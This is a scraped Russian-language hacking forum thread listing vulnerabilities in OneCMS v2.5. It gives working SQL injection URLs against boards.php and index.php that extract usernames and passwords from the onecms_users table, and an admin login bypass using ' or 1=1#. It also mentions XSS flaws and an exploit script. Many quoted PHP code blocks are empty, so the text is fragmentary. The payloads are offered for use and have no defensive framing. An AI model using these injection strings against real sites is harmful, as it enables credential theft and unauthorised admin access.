![]() |
OneCMS
OneCMS
SQL Иньекция. Цитата:
PHP код:
Цитата:
PHP код:
Цитата:
PHP код:
Активная XSS: /topic1.html Отвечаем: Цитата:
|
OneCMS v2.5
1) sql injection (требования: mq=off) file: boards.php PHP код:
Код:
boards.php?t=list&rank=Queen'+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13+from+onecms_users+--+ |
Иньекций много, но уже фильтруються
OneCMS v2.5. Пути: Цитата:
Пассивная XSS: Цитата:
Цитата:
|
Цитата:
1) By pass (требования: mq=off) file: admin.php PHP код:
login: ' or 1=1# pass: - 2) sql injection (требования: mq=off) file:index.php PHP код:
Код:
/index.php?load=elite&user=1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11+from+onecms_users+--+ |
Цитата:
Накидал сплойтик. PHP код:
|
| Время: 02:07 |